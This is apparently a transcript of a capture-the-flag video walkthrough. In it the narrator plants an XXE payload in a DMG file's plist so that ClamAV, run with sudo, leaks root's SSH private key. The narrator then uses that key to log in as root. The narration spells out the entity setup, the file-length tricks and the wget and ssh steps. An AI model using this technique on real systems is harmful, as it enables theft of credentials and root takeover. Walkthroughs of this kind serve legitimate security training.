payload all the things, XXE injection. See if we can get a vanilla exploit. classic XXE. Okay. So this is going to be the key. I'm going to zoom in, I guess. So this is what we want to put. Grab this. And let's see. Try and find a good way to get this so I can see it. Because when I paste, it kind of like overwrites it. Whenever you do hex editing, you always want to replace bytes. So like right now, I'm just replacing public. If I hit backspace, you see I changed everything. And because things can be so picky about the length of characters, just because like serializations goes like at this part of the file, the string is going to be X number of characters. When you start messing with the number of characters, you cause a lot of issues. If you have insert hit on your keyboard, you'll also insert things and screw it up that way. So hit Control Z a bunch. Let's make sure we haven't modified it. And then we want to do the XXE. So it starts out with doc type root. The root doesn't matter. I'm going to leave plist just in case that does. And then, I'm on insert mode still. Let's replace it with our payload. So do this, entity, and then the actual key name we want to leak. I'm just going to do LK. I'm using the power of hindsight because the key we want to replace is going to be 4 characters. And again, we have to keep our payload under 4, and we need the and sign and a semicolon. So I'm just going to do LK for leak. And then system, SYSTEM, yep. And then file, and I'm just going to go root SSH ID RSA to see if that key is there. I probably should do a file I know like Etsy Shadow first, but we're going to jump a few hoops and just go straight for an SSH key. So we do this, close that out. That looks good. I probably should have used double quotes because it's using double quotes everywhere else. And I'm using spaces to kind of null this out because a lot of applications do trims and that will get rid of space anyways. So I'm going to go up, and this is what I'm going to do, insert, double quote, escape. I hope I did not screw things up there. Change that. Okay, I think everything is fine. Doc type, plist, entity, LK, system, yada, yada, yada. That looks good. I'm going to do find, and I'm going to search for the key PLST. And this is the one we're going to overwrite. I'm on insert. Oop, don't want to. It's a bad habit of escaping. Do ampersand, LK, semicolon. So now what we're essentially doing is clamav is going to see this. It's going to go, oh, I want to go to this file. It's going to print information out about the DMG, and that information's actually going to be a file because we replaced it in XXE. So let's save this, and hopefully we did everything good. So I'm going to make dir dub. I'm going to move Sublime in there. And then Python 3-m HTTP server. And then we can wget 10.10.14.8 8000 sublime.dmg. And it's going to take a little bit to copy. Again, probably should find a smaller DMG file, but yeah. I just want to make sure my key is here. So let's just search for LK. We found it there. And we have the XXE here. And eyeballing it, this looks good. I don't think I made a typo, but knowing me, I probably have. So let's go run script again. And I want to grab my sudo. It's not there, darn it. Sudo paste and we're going to give it Sublime. And this is probably going to take a couple minutes to scan. So I'm just going to pause the video. We'll get resume once the scan finishes and search for the SSH key. Okay, now that that is done, we can see it took, let's see, where's duration? Just over 2 minutes. I'm going to exit that script, and then we can do grep-i open SSH on TypeScript, and we can see we have a key. So if I do less on TypeScript, we can search for that string, and we have it. So the painful thing now will be getting this key into our terminal. I'm going to try copying this. Copy. V key, paste, and we end on line 2C. So let's grab this, paste, chmod 600 key, sh-i key, root at 10.10.11.212. And we get onto the box as root. So hopefully you guys enjoyed this. Take care, and I'll see you all next time.